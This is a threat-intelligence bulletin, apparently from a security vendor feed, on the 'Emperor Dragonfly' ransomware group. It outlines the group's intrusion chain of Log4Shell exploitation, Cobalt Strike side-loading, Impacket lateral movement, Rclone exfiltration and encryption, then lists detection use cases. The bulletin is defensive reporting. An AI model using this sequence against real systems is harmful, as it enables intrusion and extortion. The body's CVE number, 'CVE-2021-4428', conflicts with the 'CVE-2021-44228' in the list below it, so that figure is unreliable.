The Newly Rebranded Emperor Dragonfly Strikes
Category: Threat Actor Activity | Industry: N/A | Level: Tactical | Source: Sygnia
Researchers from Sygnia, discovered threat groups Cheerscrypt and Night Sky have rebranded into newly formed group, "Emperor Dragonfly." Activity from the group was uncovered during an incident response investigation spanning several months. The tactics, techniques, and procedures (TTPs) utilized align with those used by Night Sky. The campaign was initiated in January 2022, with the compromise of a VMware Horizon server using the Log4Shell vulnerability CVE-2021-4428. Following the exploit, PowerShell commands have been executed to conduct reconnaissance, download payloads, and communicate with the attacker's command and control (C&C) server. Cobalt Strike beacons were downloaded as DLL files and side-loaded to be weaponized. As noted by Sygnia, "This method of Cobalt Strike deployment is a known TTP of the Night Sky operators, and the Beacon was downloaded from a known Night Sky C&C server. However, what Sygnia discovered next was surprising: in parallel to the Beacon deployment, three tools written in Go were also deployed. These binaries were compiled from open-source projects, created by Chinese-speaking developers, with documentation in English and Chinese." During the lateral movement phase, the threat actors utilized Impacket modules SMBExec.py’ and ‘WMIExec.py’. During the final phase of the attacker's campaign, data was exfiltrated with Rclone to Mega cloud storage and ransomware encryption was carried out with Cheerscrypt ransomware malware. Associations for Emperor Dragonfly is unknown, based on tools developed by the group, they are written in Chinese providing evidence of potential allegiances to China. However, little is known about the Cheerscrypt threat actors, with past activity from the group identifying themselves as pro-Ukrainian.
- Emperor Dragonfly: Establishes Foothold & Lateral Movement
Anvilogic Use Cases:
- Potential CVE-2021-44228 - Log4Shell
- Go Run Execution
- Rclone Execution